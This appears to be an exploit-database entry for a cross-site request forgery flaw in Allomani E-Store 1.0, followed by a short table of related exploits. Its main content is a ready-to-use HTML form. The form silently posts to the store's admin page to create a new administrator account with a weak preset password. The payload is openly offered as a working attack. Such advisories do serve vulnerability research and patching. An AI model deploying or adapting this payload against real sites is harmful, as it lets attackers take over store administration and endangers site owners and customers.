E-Store 1.0 XSRF Vulnerability (Add Admin) ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Script : http://allomani.com/en/store_script.html #################################################################### ===[ Exploit ]=== <form method="POST" name="form0" action="http://localhost/E-Store/admin/index.php"> <input type="hidden" name="action" value="adduserok"/> <input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/> <input type="hidden" name="username" value="webadmin"/> <input type="hidden" name="password" value="123456"/> <input type="hidden" name="email" value="Example@hotmail.com"/> <input type="hidden" name="group_id" value="1"/> <input type="hidden" name="useraddbutton" value="Add"/> </form> </body> </html> ####################################################################
Related Exploits
Other Possible E-DB Search Terms: Allomani E-Store 1.0, Allomani E-StoreDate | D | V | Title | Author |
---|---|---|---|---|
2010-06-29 |
![]() |
Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) (1) | G0D-F4Th3r |